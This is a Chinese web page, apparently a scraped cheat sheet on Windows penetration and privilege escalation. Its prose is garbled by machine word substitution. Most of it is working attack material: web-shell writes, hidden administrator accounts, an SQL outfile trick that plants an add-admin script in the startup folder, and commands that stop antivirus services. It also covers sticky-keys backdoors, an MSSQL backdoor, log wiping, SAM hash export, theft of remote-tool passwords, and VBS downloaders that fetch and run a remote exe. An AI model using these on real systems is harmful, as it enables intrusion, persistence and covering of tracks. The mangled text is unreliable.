Windows渗透与提权：技巧总结篇

联系在线客服，可以获得免费在线咨询服务。 QQ咨询我要预约

Windows渗透与提权：才力总结篇

旁站门路标题：

1、读网站配置。

2、用下列VBS：

Default

On Error Resume Next

If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then

MsgBox Space(12) &amp; "IIS Virtual Web Viewer" &amp; Space(12) &amp; Chr(13) &amp; Space(9) &amp; " Usage:Cscript vWeb.vbs", 4096, "Lilo"

WScript.Quit

End If

Set objservice = GetObject("IIS://LocalHost/W3SVC")

For Each obj3w In objservice

If IsNumeric(obj3w.Name) Then

Set OService = GetObject("IIS://LocalHost/W3SVC/" &amp; obj3w.Name)

Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")

If Err &lt;&gt; 0 Then WScript.Quit (1)

WScript.Echo Chr(10) &amp; "[" &amp; OService.ServerComment &amp; "]"

For Each Binds In OService.ServerBindings

Web = "{ " &amp; Replace(Binds, ":", " } { ") &amp; " }"

WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")

Next

WScript.Echo "Path            : " &amp; VDirObj.Path

End If

Next

12345678910111213141516171819202122232425262728293031323334353637

On Error Resume Next If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo" WScript.Quit End If Set objservice = GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice If IsNumeric(obj3w.Name) Then Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name) Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT") If Err <> 0 Then WScript.Quit (1) WScript.Echo Chr(10) & "[" & OService.ServerComment & "]" For Each Binds In OService.ServerBindings Web = "{ " & Replace(Binds, ":", " } { ") & " }" WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "") Next WScript.Echo "Path : " & VDirObj.Path End If Next

3、iis_spy 摆列（注：需要支持ASPX，反IISSPY的方法步调：将 activeds.dll，activeds.tlb 降权）。

4、取得目的站目录，不能直接跨的。大概经由“echo? ^<%execute(request(“cmd”))%^> >>X:\目的目录\X.asp”或许“copy 剧本文件 X:\目的目录\X.asp”像目的目录写入网站shell，或许还大概试试type呼吁。

网站可能目录（注：个体是假造主机类）：

Default

data/htdocs.网站/网站/

1	data/htdocs.网站/网站/

CMD 下独霸 VPN 相关知识、资料：

#答允administrator拨入该VPN：

Default

netsh ras set user administrator permit

1	netsh ras set user administrator permit

#禁止administrator拨入该VPN：

Default

netsh ras set user administrator deny

1	netsh ras set user administrator deny

#搜查哪些用户大概拨入VPN：

Default

netsh ras show user

1	netsh ras show user

#搜查VPN分配IP的方法：

Default

netsh ras ip show config

1	netsh ras ip show config

#独霸地点池的方法分配IP：

Default

netsh ras ip set addrassign method = pool

1	netsh ras ip set addrassign method = pool

#地点池的范围是从192.168.3.1到192.168.3.254：

Default

netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254

1	netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254

Cmd、Dos 呼吁行下添加 SQL 用户的方法步调：

需要有贪图员权限，在呼吁下先创建一个“c:\test.qry”文件，形式下列：

Default

exec master.dbo.sp_addlogin test,123

EXEC sp_addsrvrolemember 'test, 'sysadmin'

123	exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember 'test, 'sysadmin'

尔后在DOS下实验：cmd.exe /c isql -E /U alma /P /i c:\test.qry

另类的加用户方法步调：

在删掉了 net.exe 和不用 adsi 之外，新的加用户的方法步调。代码下列：

js:

Default

var o=new ActiveXObject( "Shell.Users" );

z=o.create("test") ;

z.changePassword("123456","")

z.setting("AccountType")=3;

 vbs:

123456789

var o=new ActiveXObject( "Shell.Users" ); z=o.create("test") ; z.changePassword("123456","") z.setting("AccountType")=3; vbs:

Default

Set o=CreateObject( "Shell.Users" )

Set z=o.create("test")

z.changePassword "123456",""

z.setting("AccountType")=3

1234567

Set o=CreateObject( "Shell.Users" ) Set z=o.create("test") z.changePassword "123456","" z.setting("AccountType")=3

Cmd 访问管制权限管制：

呼吁下列：

Default

cacls c: /e /t /g everyone:F           #c盘everyone权限

cacls "目录" /d everyone               #everyone不行读，收罗admin

123	cacls c: /e /t /g everyone:F #c盘everyone权限 cacls "目录" /d everyone #everyone不行读，收罗admin

备注：

反制方法步调，在文件夹平安设置里将 Everyone 设定为不行读，假设不有平安性选项：器材 – 文件夹选项 – 独霸繁杂的共享去掉即可。

3389 相关，下列共同PR更好：

a、防火墙TCP/IP挑拣.（封闭：net stop policyagent & net stop sharedaccess）

b、内网状况（lcx.exe）

c、终端管事器高出了最大答允毗连（XP 运转：mstsc /admin；2003 运转：mstsc /console）

1.盘考终端端口：

Default

 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

1	REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

2.封闭XP&2003终端管事：

Default

 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

1	REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更动终端端口为2008(十六进制为：0x7d8)：

Default

 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f

1	REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f

Default

 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

1	REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

4.取缔xp&2003零碎防火墙对终端管事的限定及IP毗连的限定：

Default

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@  xpsp2res.dll,-22009 /f

1	REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f

Default

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"")");

insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

select * from a into outfile "C:\\Documents and Settings\\All Users\\「初阶」菜单\\程序\\带动\\a.vbs";

123456789

create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"")"); insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); select * from a into outfile "C:\\Documents and Settings\\All Users\\「初阶」菜单\\程序\\带动\\a.vbs";

BS马的PortMap功能，相通LCX做转发。若果支持ASPX，用这个转发会窜伏点。（注：不停忽略了在偏僻角落的谁人功能）

封闭思空见贯杀软（把杀软所在的文件的整个权限去掉）：

处置惩罚惩罚变态诺顿企业版：

Default

net stop "Symantec AntiVirus" /y

net stop "Symantec AntiVirus Definition Watcher" /y

net stop "Symantec Event Manager" /y

net stop "System Event Notification" /y

net stop "Symantec Settings Manager" /y

123456789

net stop "Symantec AntiVirus" /y net stop "Symantec AntiVirus Definition Watcher" /y net stop "Symantec Event Manager" /y net stop "System Event Notification" /y net stop "Symantec Settings Manager" /y

麦咖啡：

Default

net stop "McAfee McShield"

1	net stop "McAfee McShield"

Symantec病毒日记:

Default

C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs

1	C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs

Symantec病毒备份:

Default

C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine

1	C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine

Nod32病毒备份:

Default

C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine

1	C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine

Nod32移除密码爱护:

Default

删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可

1	删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可

放置5次shift后门，沾滞键后门，变幻SHIFT后门：

5次SHIFT，沾滞键后门：

Default

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe

copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y

copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y

12345

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y

变幻SHIFT后门：

Default

attrib c:\windows\system32\sethc.exe -h -r -s

attrib c:\windows\system32\dllcache\sethc.exe -h -r -s

del c:\windows\system32\sethc.exe

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h +r +s

attrib c:\windows\system32\dllcache\sethc.exe +h +r +s

12345678910111213

attrib c:\windows\system32\sethc.exe -h -r -s attrib c:\windows\system32\dllcache\sethc.exe -h -r -s del c:\windows\system32\sethc.exe copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h +r +s attrib c:\windows\system32\dllcache\sethc.exe +h +r +s

添加隐藏零碎账号：

1、实验呼吁：“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。

2、导出注册表SAM下用户的两个键值。

3、在用户贪图界面里的 admin$ 删除，尔后把备份的注册表导归去。

4、独霸 Hacker Defender 把相关用户注册表隐藏。

放置 MSSQL 扩大后门：

Default

USE master;

EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';

GRANT exec On xp_helpsystem TO public;

12345

USE master; EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll'; GRANT exec On xp_helpsystem TO public;

处置惩罚惩罚管事器MSFTP日记：

在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三个文件，直接删除 ex0111124.log 不糜烂，透露表现“原文件…正在独霸”。

诚然大概直接删除“ex011120.log / ex011121.log”。尔后用记事本关上“ex0111124.log”，删除内中的一些形式后，保存，掩盖到场，糜烂。

当中止“msftpsvc”管其时可直接删除“ex011124.log”。

MSSQL盘考综合器毗连记实废弃：

MSSQL 2000 位于注册表下列：

Default

 HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers

1	HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers

找到接接过的静态删除。

MSSQL 2005 是在：

Default

 C:\Documents and Settings\&lt;user&gt;\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat

1	C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat

防BT零碎阻拦才力，大概独霸远程下载shell：

Default

&lt;%

Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)

Dim Ads, Retrieval, GetRemoteData

On Error Resume Next

Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", s_RemoteFileUrl, False, "", ""

.Send

GetRemoteData = .ResponseBody

End With

Set Retrieval = Nothing

Set Ads = Server.CreateObject("Adodb.Stream")

With Ads

.Type = 1

.Open

.Write GetRemoteData

.SaveToFile Server.MapPath(s_LocalFileName), 2

.Cancel()

.Close()

End With

Set Ads = Nothing

End Sub

eWebEditor_SaveRemoteFile "your shell's name", "your shell'urL"

%&gt;

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647

<% Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl) Dim Ads, Retrieval, GetRemoteData On Error Resume Next Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", s_RemoteFileUrl, False, "", "" .Send GetRemoteData = .ResponseBody End With Set Retrieval = Nothing Set Ads = Server.CreateObject("Adodb.Stream") With Ads .Type = 1 .Open .Write GetRemoteData .SaveToFile Server.MapPath(s_LocalFileName), 2 .Cancel() .Close() End With Set Ads = Nothing End Sub eWebEditor_SaveRemoteFile "your shell's name", "your shell'urL" %>

防BT零碎阻拦才力，大概独霸远程下载shell，也到达了隐藏自己的效果，也大概做为超窜伏的后门，神马的免杀网站shell，用管事器平安器材一扫完好挂掉了。

VNC、Radmin、PcAnywhere 的提权方法步调：

起首独霸 shell 读取 vnc 保具有注册表中的密文，尔后再独霸器材VNC4X破解。

注册表地位：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password

Radmin 默认端口是4899，先失掉密码和端口，下列地位：

Default

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表地位

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表地位

123	HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表地位 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表地位

尔后用HASH版毗连。

假设咱们拿到一台主机的WEBSEHLL。经由查找创造其上放置有 PcAnywhere 同时保存密码文件的目录是答允咱们的IUSER权限访问，咱们大概下载这个CIF文件到本地破解，再经由 PcAnywhere 从本机登岸管事器。

保存密码的CIF文件,不是位于PcAnywhere的放置目录,而且位于放置PcAnywhere所放置盘的：

Default

 “\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”

1	“\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”

假设PcAnywhere放置在“D:\program\”文件夹下，那末PcAnywhere的密码文件就保具有：“D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”文件夹下。

WinWebMail 提权加用户：

WinWebMail目录下的网站必需设置everyone权限可读可写，在初阶程序里，找到WinWebMail快捷方法，接上来，看门路，访问“门路\网站”传 shell，访问shell后，权限是system，直接放远控进带动项，等待下次重启。

不有删cmd组件的大概直接加用户，7i24的网站目录也是可写，权限为administrator。

1433 SA权限创建注入点：

Default

&lt;%

strSQLServerName = "管事器ip"

strSQLDBUserName = "数据库帐号"

strSQLDBPassword = "数据库密码"

strSQLDBName = "数据库称呼"

Set conn = server.CreateObject("ADODB.Connection")

strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" &amp; strSQLServerName &amp; ";User ID=" &amp; strSQLDBUserName &amp; ";Password=" &amp; strSQLDBPassword &amp; ";Database=" &amp; strSQLDBName &amp; ";"

conn.open strCon

Dim rs, strSQL, id

Set rs = server.CreateObject("ADODB.recordset")

id = request("id")

strSQL = "select * from ACTLIST where worldid=" &amp; idrs.open strSQL,conn,1,3

rs.Close

%&gt;

123456789101112131415161718192021222324252627

<% strSQLServerName = "管事器ip" strSQLDBUserName = "数据库帐号" strSQLDBPassword = "数据库密码" strSQLDBName = "数据库称呼" Set conn = server.CreateObject("ADODB.Connection") strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" conn.open strCon Dim rs, strSQL, id Set rs = server.CreateObject("ADODB.recordset") id = request("id") strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3 rs.Close %>

提权篇：

先实验systeminfo

token 裂缝补丁号 KB956572

Churrasco????????? kb952004

呼吁行RAR打包~~·

Default

rar a -k -r -s -m3 c:\1.rar c:\folder

1	rar a -k -r -s -m3 c:\1.rar c:\folder

收集零碎静态的剧本：

Default

for window：

@echo off

echo #########system info collection

systeminfo

ver

hostname

net user

net localgroup

net localgroup administrators

net user guest

net user administrator

echo #######at- with   atq#####

echo schtask /query

echo

echo ####task-list#############

tasklist /svc

echo

echo ####net-work infomation

ipconfig/all

route print

arp -a

netstat -anipconfig /displaydns

echo

echo #######service############

sc query type= service state= all

echo #######file-##############

cd \

tree -F

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455

for window： @echo off echo #########system info collection systeminfo ver hostname net user net localgroup net localgroup administrators net user guest net user administrator echo #######at- with atq##### echo schtask /query echo echo ####task-list############# tasklist /svc echo echo ####net-work infomation ipconfig/all route print arp -a netstat -anipconfig /displaydns echo echo #######service############ sc query type= service state= all echo #######file-############## cd \ tree -F

gethash 不免不免杀怎样失掉本机 hash：

起首导出注册表：

Default

Windows 2000：regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"

1	Windows 2000：regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"

Default

Windows 2003：reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg

1	Windows 2003：reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg

留意权限标题，个体注册表默认sam目录是不能访问的。需要设置为完全管制以后才大概访问（界面登录的需要留意，system权限大概忽略）。

接上来就繁杂了，把导出的注册表，down 到本机，批改注册表头导入本机，尔后用抓去hash的器材抓本地用户就OK了

hash 抓完了记得把大师的账户密码改畴前哦！

当 GetHashes 失掉不到 hash 时，大概用冰刃把 sam 复制到桌面。据我所知，或人是用这个方法步调假造机频仍因为不知道密码而进不去！~

vbs 下载者：

Default

1：

echo Set sGet = createObject("ADODB.Stream") &gt;&gt;c:\windows\cftmon.vbs

echo sGet.Mode = 3 &gt;&gt;c:\windows\cftmon.vbs

echo sGet.Type = 1 &gt;&gt;c:\windows\cftmon.vbs

echo sGet.Open() &gt;&gt;c:\windows\cftmon.vbs

echo sGet.Write(xPost.responseBody) &gt;&gt;c:\windows\cftmon.vbs

echo sGet.SaveToFile "c:\windows\e.exe",2 &gt;&gt;c:\windows\cftmon.vbs

echo Set objShell = CreateObject("Wscript.Shell") &gt;&gt;c:\windows\cftmon.vbs

echo objshell.run """c:\windows\e.exe""" &gt;&gt;c:\windows\cftmon.vbs

cftmon.vbs

12345678910111213141516171819

1： echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs echo sGet.Mode = 3 >>c:\windows\cftmon.vbs echo sGet.Type = 1 >>c:\windows\cftmon.vbs echo sGet.Open() >>c:\windows\cftmon.vbs echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs cftmon.vbs

2：

Default

On Error Resume Next:Dim iRemote,iLocal,s1,s2

iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))

s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"

Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()

Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()

sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
create table a (cmd text)：

1234567891011121314

On Error Resume Next:Dim iRemote,iLocal,s1,s2 iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream" Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send() Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open() sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2 cscript c:\down.vbs http://xxxx/mm.exe c:\mm.execreate table a (cmd text)：

Default

insert into a values ("set wshshell=createobject (""wscript.shell"")");

insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

select * from a into outfile "C:\\Documents and Settings\\All Users\\「初阶」菜单\\程序\\带动\\a.vbs";

1234567

insert into a values ("set wshshell=createobject (""wscript.shell"")"); insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); select * from a into outfile "C:\\Documents and Settings\\All Users\\「初阶」菜单\\程序\\带动\\a.vbs";

Cmd 下目录的独霸才力：

列出d的整个目录：

Default

for /d %i in (d:\freehost\*) do @echo %i

1	for /d %i in (d:\freehost\*) do @echo %i

把以后门路下文件夹的名字只有1-3个字母的透露表现出来：

Default

for /d %i in (???) do @echo %i

1	for /d %i in (???) do @echo %i

以以后目录为搜索门路，把以后目录与上面的子目录的部门EXE文件列出：

Default

for /r %i in (*.exe) do @echo %i

1	for /r %i in (*.exe) do @echo %i

以指定目录为搜索门路，把以后目录与上面的子目录的整个文件列出：

Default

for /r "f:\freehost\hmadesign\网站\" %i in (*.*) do @echo %i

1	for /r "f:\freehost\hmadesign\网站\" %i in (.) do @echo %i

这个会透露表现a.txt内中的形式，因为/f的感召，会读出a.txt中：

Default

for /f %i in (c:\1.txt) do echo %i

1	for /f %i in (c:\1.txt) do echo %i

delims=后的空格是分隔符，tokens是取第几个地位：

Default

for /f "tokens=2 delims= " %i in (a.txt) do echo %i

1	for /f "tokens=2 delims= " %i in (a.txt) do echo %i

Windows 零碎下的一些思空见贯门路（大概将c盘换成d,e盘,比方星外假造主机跟华众得,个体都放在d盘）：

Default

c:\windows\php.ini

c:\boot.ini

c:\1.txt

c:\a.txt

c:\CMailServer\config.ini

c:\CMailServer\CMailServer.exe

c:\CMailServer\WebMail\index.asp

c:\program files\CMailServer\CMailServer.exe

c:\program files\CMailServer\WebMail\index.asp

C:\WinWebMail\SysInfo.ini

C:\WinWebMail\Web\default.asp

C:\WINDOWS\FreeHost32.dll

C:\WINDOWS\7i24iislog4.exe

C:\WINDOWS\7i24tool.exe

c:\hzhost\databases\url.asp

c:\hzhost\hzclient.exe

C:\Documents and Settings\All Users\「初阶」菜单\程序\7i24假造主机贪图平台\积极设置[受控端].lnk

C:\Documents and Settings\All Users\「初阶」菜单\程序\Serv-U\Serv-U Administrator.lnk

C:\WINDOWS\网站.config

c:\网站\index.html

c:\www\index.html

c:\WWWROOT\index.html

c:\网站site\index.html

c:\网站\index.asp

c:\www\index.asp

c:\wwwsite\index.asp

c:\WWWROOT\index.asp

c:\网站\index.php

c:\www\index.php

c:\WWWROOT\index.php

c:\WWWsite\index.php

c:\网站\default.html

c:\www\default.html

c:\WWWROOT\default.html

c:\网站site\default.html

c:\网站\default.asp

c:\www\default.asp

c:\wwwsite\default.asp

c:\WWWROOT\default.asp

c:\网站\default.php

c:\www\default.php

c:\WWWROOT\default.php

c:\WWWsite\default.php

C:\Inetpub\wwwroot\pagerror.gif

c:\windows\notepad.exe

c:\winnt\notepad.exe

C:\Program Files\Microsoft Office\OFFICE10\winword.exe

C:\Program Files\Microsoft Office\OFFICE11\winword.exe

C:\Program Files\Microsoft Office\OFFICE12\winword.exe

C:\Program Files\网络 Explorer\IEXPLORE.EXE

C:\Program Files\winrar\rar.exe

C:\Program Files\360\360Safe\360safe.exe

C:\Program Files\360Safe\360safe.exe

C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log

c:\ravbin\store.ini

c:\rising.ini

C:\Program Files\Rising\Rav\RsTask.xml

C:\Documents and Settings\All Users\Start Menu\desktop.ini

C:\Documents and Settings\Administrator\My Documents\Default.rdp

C:\Documents and Settings\Administrator\Cookies\index.dat

C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt

C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt

C:\Documents and Settings\Administrator\My Documents\1.txt

C:\Documents and Settings\Administrator\桌面\1.txt

C:\Documents and Settings\Administrator\My Documents\a.txt

C:\Documents and Settings\Administrator\桌面\a.txt

C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg

E:\Inetpub\wwwroot\aspnet_client\system_网站\1_1_4322\SmartNav.htm

C:\Program Files\RhinoSoft.com\Serv-U\Version.txt

C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

C:\Program Files\Symantec\SYMEVENT.INF

C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe

C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf

C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf

C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf

C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm

C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT

C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll

C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini

C:\MySQL\MySQL Server 5.0\my.ini

C:\Program Files\MySQL\MySQL Server 5.0\my.ini

C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm

C:\Program Files\MySQL\MySQL Server 5.0\COPYING

C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql

C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe

c:\MySQL\MySQL Server 4.1\bin\mysql.exe

c:\MySQL\MySQL Server 4.1\data\mysql\user.frm

C:\Program Files\Oracle\oraconfig\Lpk.dll

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe

C:\WINDOWS\system32\inetsrv\w3wp.exe

C:\WINDOWS\system32\inetsrv\inetinfo.exe

C:\WINDOWS\system32\inetsrv\MetaBase.xml

C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp

C:\WINDOWS\system32\config\default.LOG

C:\WINDOWS\system32\config\sam

C:\WINDOWS\system32\config\system

c:\CMailServer\config.ini

c:\program files\CMailServer\config.ini

c:\tomcat6\tomcat6\bin\version.sh

c:\tomcat6\bin\version.sh

c:\tomcat\bin\version.sh

c:\program files\tomcat6\bin\version.sh

C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh

c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log

c:\Apache2\Apache2\bin\Apache.exe

c:\Apache2\bin\Apache.exe

c:\Apache2\php\license.txt

C:\Program Files\Apache Group\Apache2\bin\Apache.exe

c:\Program Files\QQ2007\qq.exe

c:\Program Files\Tencent\, qq\User.db

c:\Program Files\Tencent\qq\qq.exe

c:\Program Files\Tencent\qq\bin\qq.exe

c:\Program Files\Tencent\qq2009\qq.exe

c:\Program Files\Tencent\qq2008\qq.exe

c:\Program Files\Tencent\qq2010\bin\qq.exe

c:\Program Files\Tencent\qq\Users\All Users\Registry.db

C:\Program Files\Tencent\TM\TMDlls\QQZip.dll

c:\Program Files\Tencent\Tm\Bin\Txplatform.exe

c:\Program Files\Tencent\RTXServer\AppConfig.xml

C:\Program Files\Foxmal\Foxmail.exe

C:\Program Files\Foxmal\accounts.cfg

C:\Program Files\tencent\Foxmal\Foxmail.exe

C:\Program Files\tencent\Foxmal\accounts.cfg

C:\Program Files\LeapFTP 3.0\LeapFTP.exe

C:\Program Files\LeapFTP\LeapFTP.exe

c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe

c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt

C:\Program Files\FlashFXP\FlashFXP.ini

C:\Program Files\FlashFXP\flashfxp.exe

c:\Program Files\Oracle\bin\regsvr32.exe

c:\Program Files\腾讯游戏\QQGAME\readme.txt

c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt

c:\Program Files\tencent\QQGAME\readme.txt

C:\Program Files\StormII\Storm.exe

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267

